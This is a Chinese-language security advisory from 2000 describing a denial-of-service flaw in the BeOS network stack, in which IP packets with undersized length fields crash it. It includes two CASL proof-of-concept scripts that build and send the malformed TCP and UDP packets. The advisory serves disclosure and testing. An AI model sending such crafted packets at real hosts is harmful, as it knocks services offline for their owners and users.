BeOS 网络堆栈拒绝服务攻击漏洞
发布日期:2000-04-09
更新日期:2000-04-09
受影响系统:BeOS
描述:
当接受一些特殊格式的IP包时,BeOS的网络堆栈就会崩溃。一种是协议设置为TCP的IP包,
如果它的长度字段被设置成小于40字节,它就会使正在接受的的网络进程崩溃。同样,如
果一个IP包的协议字段设置为UDP,但它的IP长度字段设置成小于28字节,这个包也会导致
BeOS的网络堆栈崩溃。40字节是IP+TCP头的最小长度,28字节是IP+UDP头的最小长度。
<* 来源: Tim Newsham (newsham@LAVA.NET)
Mike Frantzen (ISIC)
相关链接: http://bebugs.be.com/devbugs/
http://expert.cc.purdue.edu/~frantzen/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面是两个简单的测试程序,使用CASL脚本语言。CASL是NAI公司的一种包处理脚本语言。
可以从 ftp://ftp.nai.com/pub/security/casl/ 免费下载。
Script 1:
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy UDPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;
packet = [ IPH ];
ip_output(packet);
Script 2:
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet = [ IPH ];
ip_output(packet);
建议:
BeOS已经知道了这个问题,不久将会重新替换整个网络系统实现部分。
浏览次数:6518
严重程度:0(网友投票)